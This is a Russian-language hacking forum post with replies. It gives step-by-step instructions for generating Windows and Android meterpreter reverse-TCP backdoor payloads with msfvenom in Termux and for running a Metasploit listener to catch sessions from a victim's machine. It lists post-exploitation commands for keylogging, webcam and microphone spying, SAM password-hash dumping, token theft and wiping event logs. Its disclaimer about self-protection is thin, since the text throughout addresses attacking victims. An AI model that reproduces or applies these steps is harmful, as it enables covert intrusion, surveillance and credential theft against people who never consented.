Сперва,хочется сказать,что я вас ни к чему не призываю и вся информация в данном посте имеется лишь для того,чтобы вы могли защитить себя от зловреда.Также я не отвечаю за ваши действия с техникой ,будь она ваша или чужая. Данный бэкдор использует уязвимость OC windows или Android с помощью терминала TERMUX и metasploit framework. Благодаря этой уязвимости мы можем коннектиться к веб камере, включать кейлогер, убивать процессы, скринить рабочий стол и многое другое. Итак приступим: Скачиваем TERMUX с playmarket Открываем и вводим команду: #pkg update и #pkg upgrade Теперь клонируем metasploit: #git clone Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником ссылка не работает,то найдите ее на GitHub) Переходим в директорию metasploit #cd metasploit-framework Теперь создаём эксплоит #msfvenom -p windows/meterpreter/reverse_tcp lhost=IP атакующего lport=4444 -f exe R > /sdcard/mypayload.exe Файл сохраняется в памяти телефона.Запускаем metasploit : #msfconsole #set payload windows/meterpreter/reverse_tcp #set LHOST 192.168.1.65 (IP атакующего) #set LPORT 4444 #run Всё metasploit запущен, теперь необходимо запустить mypayload.exe на машине жертвы.Если появилась строка Meterpreter session 1 opened, то мы успешно подключены.Чтобы увидеть список возможностей # -h или ? Основные команды : Команда Описание _________________________________________________ cat Вывести содержимое файла на экран cd Сменить директорию checksum Получить контрольную сумму файла cp Скопировать файл/директорию в другое место dir Вывести список файлов (псевдоним для ls) download Загрузить файл или директорию edit Отредактировать файл getlwd Вывести локальную рабочую директорию getwd Вывести рабочую директорию lcd Изменить локальную рабочу директорию lpwd Вывести локальную рабочую директорию ls Показать список файлов mkdir Создать директорию mv Переместить файл/директорию в другое место pwd Вывести рабочую директорию rm Удалить указанный файл rmdir Удалить директорию search Поиск файлов show_mount Вывести всех точек монтирования/логических дисков upload Выгрузить файл или директорию Сетевые команды : Команда Описание -----— —--------- arp Показать ARP кэш хоста getproxy Показать текущие настройки прокси ifconfig Показать интерфейсы ipconfig Показать интерфейсы netstat Показать сетевые соединения portfwd Перенаправить локальный порт на удалённую службу resolve Сделать запросы с цели на преобразование одного или нескольких имён хостов route Просмотр и изменение таблицы маршрутизации Системные команды : Команда Описание ______________________________________________________________ clearev Очистить журнал событий drop_token Отбрасывает любой активный токен имперсонализации. execute Выполнить команду getenv Получить значение одной или более переменных окружения getpid Получить идентификатор текущего процесса getprivs Попытаться включить все привилегии, доступные для текущего процесса getsid Получение SID пользователя getuid Получение имени пользователя kill Завершить процесс localtime Показать локальную дату и время целевой системы pgrep Фильтрация процессов по имени pkill Завершить процесс по имени ps Список запущенных процессов reboot Перезагрузить удалённый компьютер reg Изменение и взаимодействие с удалённым регистром rev2self Вызов RevertToSelf() на удалённой машине shell Перейти в системную командную оболочку shutdown Отключить удалённый компьютер steal_token Попытаться украсть impersonation token из целевого процесса suspend Приостанавливает или возобновляет список процессов sysinfo Получает информацию об удалённой системе, такую как вид ОС Команды пользовательского интерфейса : Команда Описание _______________________________________________________________________________ enumdesktops Список всех доступных рабочих столов и оконных станций getdesktop Получить текущий рабочий стол meterpreter idletime Возвращает количество секунд отсутствия активности удалённого пользователя keyscan_dump Дамп буфера нажатия клавиш keyscan_start Запустить захват нажатие клавиш keyscan_stop Остановить захват нажатия клавиш screenshot Получение скриншота интерактивного рабочего стола setdesktop Изменение текущего рабочего стола meterpreters uictl Контроль некоторых компонентов пользовательских интерфейсов Команды для управления вэб-камерой : Команда Описание ________________________________________________ record_mic Запись аудио со стандартного микрофона в течение X секунд webcam_chat Начать видеочат webcam_list Вывести список веб-камер webcam_snap Сделать снимок указанной веб-камерой webcam_stream Запустить выдиопоток с выбранной веб-камеры Команда для работы с базой данных паролей : Команда Описание _____________________________________________ hashdump Дампит содержимое базы данных SAM _____________________________________________ Если у вас есть какие-либо вопросы по теме,то я буду рад ответить и пообщаться с вами. Всем удачи! _____________________________________________ Так же можно сделать и с Android смартфоном,изменив команду на: #msfvenom -p android/meterpreter/reverse_tcp lhost=IP атакующего lport=4444 R > /sdcard/mypayload.apk
Ну термукс эт терминал на основе Линукс. А сами ОС это оболочки. В принципе уважаемому хацкеру нужен терминал а не картинка. ) А Кали я использую только ради метасплоитов и снифферов. На пк Термукс не запустится же. Не , ес качать эмуляторы АПК , потом инсталлировать их и уже потом Термукс качать как то не. Кали только уважаю из за компактности и функционалу. А Термукс из за мобильности .
Я из-за этого и решил написать этот мини гайд,т.к. некоторых устраивает и винда,а TERMUX на смартфон можно поставить и без рут прав,что для некоторых будет зеленым светом